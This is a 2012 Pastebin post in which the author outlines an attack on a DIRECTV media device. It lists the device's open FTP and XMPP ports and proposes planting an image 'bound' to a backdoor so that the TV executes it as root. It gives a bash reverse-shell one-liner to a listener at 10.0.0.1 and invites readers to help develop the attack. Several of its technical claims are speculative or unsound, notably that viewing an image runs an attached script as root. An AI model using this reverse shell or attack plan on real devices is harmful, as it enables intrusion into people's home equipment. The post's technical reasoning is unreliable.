Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

[TV Hacking] DIRECT - Remote Keyboard - Apps - Hex00010

By: Hex00010 on Jun 20th, 2012  |  syntax: None  |  size: 4.42 KB  |  hits: 163  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. Re - Linking all of my old ' guest ' pastebins to one main account so i dont have to search for all of them through google
  2.  
  3.  
  4. Main PasteBin Link -> http://pastebin.com/VDcSTxdK
  5. -------------------------------------------------------------------------------------------------------
  6.  
  7.  
  8. [TV Hacking] DIRECTV
  9.  
  10. This is a  exploitation method  in order to gain access to DIRECTV's device in he networksharing center its defined as DIRECTV server and media
  11.  
  12. If you can understand everything i say below and can also help in the development of this much would be appreciated
  13.  
  14. Thanks
  15.  
  16.  
  17. http://[ SITE  TAKEN DOWN ]
  18. -------------------------------------------------------------------------------------------------------
  19.  
  20.  
  21.  
  22.  
  23.  
  24. Hi guys  in light of certain stuff that has happened to me in the past  i am  auditing my TV  for certain reasons  in doing so  im going  to just  talk about my adventure in hacking the TV  and  providing  what all i done - what happend - etc etc
  25.  
  26.  
  27.  
  28. First thing is first
  29.  
  30.  
  31. DIRECTV  Media Share  -   Requires  Media  Sharing  open on the network
  32.  
  33.  
  34.  
  35.  
  36. My auditing report may be diff  than your's as  i am targeting something specific
  37.  
  38.  
  39. DIRECTV allows the use  of external applications to be ran on the device such as
  40.  
  41.  
  42. chrome ,  netflix , etc etc
  43.  
  44.  
  45. My main target here is  NetFlix    -  What am i wanting to do?
  46.  
  47.  
  48. Im wanting to log all connections that are being sent out  and  being  sent in to the  device.
  49.  
  50.  
  51. Now What  does  DIRECTV  Have  Open
  52.  
  53. Port 5222
  54. Port  2121 - FTP  Port  ---Version   uses   OFTP
  55.  
  56.  
  57. OS:  Linux
  58.  
  59.  
  60.  
  61. Hacking  Methods:
  62.  
  63.  
  64. First thing i want to do  is be able to see if i can output data  to the TV Screen   -  Im trying to lookup  more information on how the  Applications  are  programmed and what not and see if  i can  just  use the API  for printing messages  and include it into a script      and see if it could execute on the screen
  65.  
  66.  
  67. Steps  To do Such:
  68.  
  69. 1. We know that DIRECTV    executes    and  writes data  to files   almost  24x7   - We are  given FTP access  however  it is  using the OFTP
  70.  
  71. OFTP    runs on non root  and is   protected   from system root commands   also  prevents  from  viewing  the whole entire directory  or  directories
  72.  
  73. So what  do we  do now?
  74.  
  75.  
  76. Welll  we  know that   the service is  being ran off  non root and  we know that the folders  structure  is
  77.  
  78. Android
  79. Data
  80. Videos
  81. Pictures
  82. etc..... etc....
  83.  
  84. Well if we were to browse to the TV  and  go to my Pictures  or videos  and were  to see pictures   -  What  does that tell you?
  85.  
  86.  
  87.  
  88. 1.  We  can force the System  to  execute  a  script  from the  FTP service   as  root  
  89.  
  90. Think about it
  91.  
  92.  
  93. We browse on the TV Screen
  94. Go to pictures
  95.  
  96.  
  97. ------
  98. While  being at the computer  you   some how  find a way to bind  data  to a  image  , video , etc etc  and  you  place it in the FTP server
  99.  
  100. --------
  101.  
  102. now  that your in the pictures  screen  -  you now see  your new image  
  103.  
  104. you then select it
  105.  
  106. What happens?
  107.  
  108.  
  109. DIRECTV   Executes  the file  -  We also  Binded  a    Backdoor to it
  110.  
  111. What  exactly did this backdoor  have in it?
  112.  
  113.  
  114. Well we know that  the  Linux Kernel that is being  used is  Linux 2.6.17  - 2.6.36
  115.  
  116. So  we  know also that   DIRECTV  uses  Silverlight  from Microsoft  so we at  least  know  it is using some standerd  Microsoft  Library/Include files
  117.  
  118. So we  do have the possibility  for  creating a  TCP Connection
  119.  
  120. We also know that  it is  using Linux
  121.  
  122. And what does Linux have that we all like as a  hacker ?
  123.  
  124. the simple  Back- Connect  Reverse    HTTP  Send 1 Request
  125.  
  126. By using the       :)
  127.  
  128. {bash -i >& /dev/tcp/10.0.0.1/8081 0>&1} #8080 is already in use - also i think this device runs WinRM also it has a  xmpp-client as a service for port 5222  - still  lookinh into that
  129.  
  130. So  we  add a  .file-name   ( in reality  is  SH/BASH etc etc )
  131.  
  132. Bind the  file to the  picture      _ now remember  we have a  reverse back connect  going on.
  133.  
  134.  
  135. After DIRECTV  loads the image on screen you now have a  Reverse Connection
  136.  
  137.  
  138. What next?
  139.  
  140.  
  141. Rooting the OS
  142.  
  143.  We know that the OS  is  Linux 2.6.17  - 2.6.36   -
  144.  
  145.  
  146.  
  147. Now  here  is the part  im going  to have to do more research on  - As  its not  just like simply rooting  your ordinary   linux system  it requires much more then just that
  148.  
  149.  
  150. however i will update this thread as i go along
  151.  
  152.  
  153. If you guys have any suggestions or advice  that you can help   -  Just  tell me
  154.  
  155.  
  156.  
  157. Will Be updated Soon
create a new version of this paste RAW Paste Data